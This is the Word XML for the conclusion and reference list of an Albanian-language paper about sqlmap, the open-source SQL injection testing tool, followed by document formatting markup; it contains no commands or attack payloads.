      <w:r w:rsidRPr="00873C59">
        <w:rPr>
          <w:color w:val="2E74B4"/>
        </w:rPr>
        <w:t xml:space="preserve">Konkluzione </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A12A2C5" w14:textId="6F8F3456" w:rsidR="00C350F5" w:rsidRDefault="00C350F5" w:rsidP="00D33E3E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63D7AC9E" w14:textId="64062075" w:rsidR="009321AD" w:rsidRDefault="009321AD" w:rsidP="00D33E3E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A181A65" w14:textId="4BDA17C0" w:rsidR="009321AD" w:rsidRDefault="009321AD" w:rsidP="00D33E3E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="580"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sqlmap është një vegël e mirë kur bëhet fjalë pë zbulimin e dobësive të injektimit </w:t>
      </w:r>
      <w:r w:rsidR="00D33E3E">
        <w:t>sql. Me kaq shumë opsione të mbështetura dh</w:t>
      </w:r>
      <w:r w:rsidR="00E30322">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00D33E3E">
        <w:t xml:space="preserve"> aftësi për të krijuar skriptë të personalizuar, ai dallohet nga shumë vegla tjera open source për testimin e cenueshmërisë së injektimit sql.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DCA04E" w14:textId="64EFFA17" w:rsidR="00D33E3E" w:rsidRPr="00D33E3E" w:rsidRDefault="00D33E3E" w:rsidP="00D33E3E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Thënë këtë , edhe pse vegla ofron automatizim të shumë procese dhe lehtëson mjaft punën, përdoruesi i saj duhet të ketë njohuri për sql injections në mënyrë që të dijë se si të e përdor në maksimum veglën dhe të dijë qfarë sulmesh të përdorë. Si punë shtesë për të ardhmen ky punim mund të plotësohet edhe më tutje duke eksploruar më shumë veti dhe opsione të kësaj vegle të cilat nuk kanë mundur të përfshihen në këtë punim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E215ADA" w14:textId="77777777" w:rsidR="00D33E3E" w:rsidRDefault="00D33E3E" w:rsidP="009321AD"/>
    <w:p w14:paraId="23735D4D" w14:textId="093C7E51" w:rsidR="00D33E3E" w:rsidRDefault="00D33E3E" w:rsidP="009321AD">
      <w:pPr>
        <w:sectPr w:rsidR="00D33E3E">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1380" w:right="1320" w:bottom="920" w:left="1220" w:header="727" w:footer="739" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BCF23AC" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="009C0AEA" w:rsidP="000C31F5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74984902" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="009C0AEA" w:rsidP="000C31F5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1135D587" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="009C0AEA" w:rsidP="000C31F5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="594D6300" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="003B7A3C" w:rsidP="000C31F5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="220" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_TOC_250000"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r>
        <w:rPr>
          <w:color w:val="2E74B4"/>
        </w:rPr>
        <w:t>Referencat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9765A9" w14:textId="030F04F4" w:rsidR="00B46516" w:rsidRPr="005B082C" w:rsidRDefault="00BE41BB" w:rsidP="00B46516">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId31">
        <w:r w:rsidR="00B46516" w:rsidRPr="00B46516">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="1155CC"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://tools.kali.org/vulnerability-analysis/sqlmap</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="723DBEEF" w14:textId="77777777" w:rsidR="005B082C" w:rsidRPr="00B46516" w:rsidRDefault="005B082C" w:rsidP="005B082C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1066" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="484311E4" w14:textId="2DEC3499" w:rsidR="005B082C" w:rsidRDefault="00BE41BB" w:rsidP="005B082C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidR="005B082C" w:rsidRPr="00E927A3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>http://sqlmap.org/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="59AAA87F" w14:textId="77777777" w:rsidR="005B082C" w:rsidRPr="005B082C" w:rsidRDefault="005B082C" w:rsidP="005B082C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1066" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73FBB8DF" w14:textId="20ADAFC6" w:rsidR="009C0AEA" w:rsidRDefault="00B46516" w:rsidP="000C31F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1065"/>
          <w:tab w:val="left" w:pos="1066"/>
        </w:tabs>
        <w:spacing w:before="29"/>
        <w:ind w:right="512"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Bernardo Damel A.G., Miroslav Stampar “Sqlmap user’s manual“ April 10, 2011</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423D0404" w14:textId="77777777" w:rsidR="005B082C" w:rsidRDefault="005B082C" w:rsidP="005B082C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1065"/>
          <w:tab w:val="left" w:pos="1066"/>
        </w:tabs>
        <w:spacing w:before="29"/>
        <w:ind w:left="220" w:right="512"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AF025EB" w14:textId="0BB02D43" w:rsidR="009C0AEA" w:rsidRDefault="00BE41BB" w:rsidP="000C31F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1065"/>
          <w:tab w:val="left" w:pos="1066"/>
        </w:tabs>
        <w:ind w:right="2251"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidR="005B082C" w:rsidRPr="00144CA1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>https://portswigger.net/web-security/sql-injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="09EB7939" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="009C0AEA" w:rsidP="000C31F5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C8D2983" w14:textId="036E8534" w:rsidR="005B082C" w:rsidRDefault="00BE41BB" w:rsidP="00522A06">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1065"/>
          <w:tab w:val="left" w:pos="1066"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidR="005B082C" w:rsidRPr="00E927A3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://beaglesecurity.com/blog/vulnerability/boolean-based-blind-sql-injection.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:sectPr w:rsidR="005B082C">
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1380" w:right="1320" w:bottom="920" w:left="1220" w:header="727" w:footer="7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7C2AF" w14:textId="77777777" w:rsidR="00BE41BB" w:rsidRDefault="00BE41BB">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="51F77102" w14:textId="77777777" w:rsidR="00BE41BB" w:rsidRDefault="00BE4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686794"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="0FEF615C" w14:textId="7F4D9825" w:rsidR="00BF613E" w:rsidRDefault="00BF61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9CC97A" w14:textId="405B76F5" w:rsidR="009C0AEA" w:rsidRDefault="009C0AE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C8D4C" w14:textId="77777777" w:rsidR="00BE41BB" w:rsidRDefault="00BE41BB">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0855ED94" w14:textId="77777777" w:rsidR="00BE41BB" w:rsidRDefault="00BE41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B505" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="00BE41BB">
    <w:pPr>
      <w:pStyle w:val="BodyText"/>
      <w:spacing w:line="14" w:lineRule="auto"/>
      <w:rPr>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:pict w14:anchorId="1DCE96F1">
        <v:line id="_x0000_s1028" style="position:absolute;z-index:-15907328;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" from="1in,50.4pt" to="540pt,50.4pt" strokeweight="1.5pt">
          <w10:wrap anchorx="page" anchory="page"/>
        </v:line>
      </w:pict>
    </w:r>
    <w:r>
      <w:pict w14:anchorId="1981667B">
        <v:shapetype id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
          <v:stroke joinstyle="miter"/>
          <v:path gradientshapeok="t" o:connecttype="rect"/>
        </v:shapetype>
        <v:shape id="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:270.15pt;margin-top:35.35pt;width:71.7pt;height:14.3pt;z-index:-15906816;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" filled="f" stroked="f">
          <v:textbox style="mso-next-textbox:#_x0000_s1027" inset="0,0,0,0">
            <w:txbxContent>
              <w:p w14:paraId="05CFBE16" w14:textId="58E6B1B0" w:rsidR="009C0AEA" w:rsidRDefault="00EF2D7F">
                <w:pPr>
                  <w:pStyle w:val="BodyText"/>
                  <w:spacing w:before="13"/>
                  <w:ind w:left="20"/>
                  <w:rPr>
                    <w:lang w:val="en-US"/>
                  </w:rPr>
                </w:pPr>
                <w:proofErr w:type="spellStart"/>
                <w:r>
                  <w:rPr>
                    <w:lang w:val="en-US"/>
                  </w:rPr>
                  <w:t>Sqlmap</w:t>
                </w:r>
                <w:proofErr w:type="spellEnd"/>
              </w:p>
              <w:p w14:paraId="253B98C3" w14:textId="77777777" w:rsidR="00EF2D7F" w:rsidRPr="00EF2D7F" w:rsidRDefault="00EF2D7F">
                <w:pPr>
                  <w:pStyle w:val="BodyText"/>
                  <w:spacing w:before="13"/>
                  <w:ind w:left="20"/>
                  <w:rPr>
                    <w:lang w:val="en-US"/>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B149F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7E983240"/>
    <w:lvl w:ilvl="0" w:tplc="378416BE">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="[%1]"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1066" w:hanging="846"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="-2"/>
        <w:w w:val="100"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="sq-AL" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="B472FF5E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1924" w:hanging="846"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="sq-AL" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="407C3272">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2788" w:hanging="846"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="sq-AL" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="C85893CA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3652" w:hanging="846"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="sq-AL" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="2D78A0F4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4516" w:hanging="846"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="sq-AL" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="3DBE01F0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5380" w:hanging="846"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="sq-AL" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="CC84947E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6244" w:hanging="846"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="sq-AL" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="3990A5E2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7108" w:hanging="846"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="sq-AL" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="474CC0C4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7972" w:hanging="846"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="sq-AL" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="43AC64A3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F850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0A33BB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B6623F0E"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="32"/>
        <w:szCs w:val="32"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="1152"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1.%2.%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1800" w:hanging="1368"/>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68DA3602"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="35C8C690"/>
    <w:lvl w:ilvl="0" w:tplc="110E8C48">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperRoman"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="660" w:hanging="440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b/>
        <w:bCs/>
        <w:w w:val="100"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="sq-AL" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="446E93A2">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperRoman"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1300" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="2E74B4"/>
        <w:w w:val="100"/>
        <w:sz w:val="32"/>
        <w:szCs w:val="32"/>
        <w:lang w:val="sq-AL" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="3D6A678E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="670" w:hanging="270"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:eastAsia="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
        <w:color w:val="1F497D"/>
        <w:w w:val="100"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="sq-AL" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="3FE6D324">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2350" w:hanging="270"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="sq-AL" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="A852E57A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3400" w:hanging="270"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="sq-AL" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="036827FA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4450" w:hanging="270"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="sq-AL" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="06A8ACAA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5500" w:hanging="270"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="sq-AL" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="8FECC674">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6550" w:hanging="270"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="sq-AL" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0A78DC02">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7600" w:hanging="270"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="sq-AL" w:eastAsia="en-US" w:bidi="ar-SA"/>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C0AEA"/>
    <w:rsid w:val="0003327A"/>
    <w:rsid w:val="0004150C"/>
    <w:rsid w:val="000668E6"/>
    <w:rsid w:val="00067511"/>
    <w:rsid w:val="000A30DB"/>
    <w:rsid w:val="000B0D4D"/>
    <w:rsid w:val="000C2270"/>
    <w:rsid w:val="000C31F5"/>
    <w:rsid w:val="000D1F11"/>
    <w:rsid w:val="000E6107"/>
    <w:rsid w:val="00101AE1"/>
    <w:rsid w:val="00105B37"/>
    <w:rsid w:val="00180773"/>
    <w:rsid w:val="001B4151"/>
    <w:rsid w:val="001E20FD"/>
    <w:rsid w:val="00213158"/>
    <w:rsid w:val="002C682F"/>
    <w:rsid w:val="002D489F"/>
    <w:rsid w:val="002E53ED"/>
    <w:rsid w:val="00382E55"/>
    <w:rsid w:val="003A6E31"/>
    <w:rsid w:val="003B7A3C"/>
    <w:rsid w:val="003D2F28"/>
    <w:rsid w:val="00406367"/>
    <w:rsid w:val="004974AA"/>
    <w:rsid w:val="004B1B50"/>
    <w:rsid w:val="004C695F"/>
    <w:rsid w:val="004F1E56"/>
    <w:rsid w:val="005016C7"/>
    <w:rsid w:val="00522A06"/>
    <w:rsid w:val="005672AE"/>
    <w:rsid w:val="0059593B"/>
    <w:rsid w:val="005B082C"/>
    <w:rsid w:val="005E0FB6"/>
    <w:rsid w:val="00707BD8"/>
    <w:rsid w:val="007344BE"/>
    <w:rsid w:val="00847EB2"/>
    <w:rsid w:val="00873C59"/>
    <w:rsid w:val="008A2531"/>
    <w:rsid w:val="008B1807"/>
    <w:rsid w:val="008E07AC"/>
    <w:rsid w:val="008E7B51"/>
    <w:rsid w:val="00907F1F"/>
    <w:rsid w:val="009321AD"/>
    <w:rsid w:val="009B3BE8"/>
    <w:rsid w:val="009C0AEA"/>
    <w:rsid w:val="009F3CDF"/>
    <w:rsid w:val="00A1225C"/>
    <w:rsid w:val="00A602F0"/>
    <w:rsid w:val="00AF75BD"/>
    <w:rsid w:val="00B01FF3"/>
    <w:rsid w:val="00B42726"/>
    <w:rsid w:val="00B46516"/>
    <w:rsid w:val="00B66DAE"/>
    <w:rsid w:val="00BA4181"/>
    <w:rsid w:val="00BE41BB"/>
    <w:rsid w:val="00BF613E"/>
    <w:rsid w:val="00C25634"/>
    <w:rsid w:val="00C350F5"/>
    <w:rsid w:val="00C702E5"/>
    <w:rsid w:val="00C858E0"/>
    <w:rsid w:val="00CA4304"/>
    <w:rsid w:val="00CB3339"/>
    <w:rsid w:val="00CB41F6"/>
    <w:rsid w:val="00CD1209"/>
    <w:rsid w:val="00D33E3E"/>
    <w:rsid w:val="00D4310B"/>
    <w:rsid w:val="00D55C75"/>
    <w:rsid w:val="00D728D2"/>
    <w:rsid w:val="00D969C0"/>
    <w:rsid w:val="00DE2B3A"/>
    <w:rsid w:val="00E13299"/>
    <w:rsid w:val="00E30322"/>
    <w:rsid w:val="00E44FDA"/>
    <w:rsid w:val="00E8469B"/>
    <w:rsid w:val="00EB4893"/>
    <w:rsid w:val="00EF2D7F"/>
    <w:rsid w:val="00F579B2"/>
    <w:rsid w:val="00F76588"/>
    <w:rsid w:val="00FB3A8D"/>
    <w:rsid w:val="00FC1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B31D2"/>
  <w15:docId w15:val="{E1F40FC9-0E8C-4FF0-B1FD-D8A4F971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sq-AL"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="90"/>
      <w:ind w:left="1300" w:hanging="720"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="89"/>
      <w:ind w:left="220"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="138"/>
      <w:ind w:left="220"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="220"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="220"/>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1"/>
      <w:ind w:left="880" w:hanging="660"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
  </w:style>
